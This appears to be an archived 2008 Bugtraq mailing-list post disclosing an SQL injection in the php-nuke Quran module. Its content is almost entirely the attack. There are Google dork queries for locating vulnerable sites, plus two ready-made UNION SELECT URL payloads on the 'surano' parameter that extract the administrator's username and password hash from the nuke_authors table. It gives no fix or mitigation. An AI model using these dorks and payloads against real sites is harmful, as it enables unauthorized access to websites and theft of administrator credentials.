php-nuke Quran SQL Injection(surano)

---

• From: hackturkiye.hackturkiye@xxxxxxxxx
• Date: 23 Feb 2008 13:31:32 -0000

---

###############################################################
#
# php-nuke Quran SQL Injection(surano)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@xxxxxxxxx
#
################################################################
#
# DORK 1 : allinurl: "modules php name Quran"surano
#
# DORK 2 : allinurl: "modules php name Quran"
#
################################################################
EXPLOIT :

admin

modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,aid,222,333,444/**/from/**/nuke_authors/*where%20admin1

pass

modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,pwd,222,333,444/**/from/**/nuke_authors/*where%20admin1


################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

---

• Prev by Date: php nuke gallery SQL Injection(aid)
• Next by Date: CastleCops Six Years Old
• Previous by thread: php nuke gallery SQL Injection(aid)
• Next by thread: CastleCops Six Years Old
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2008-02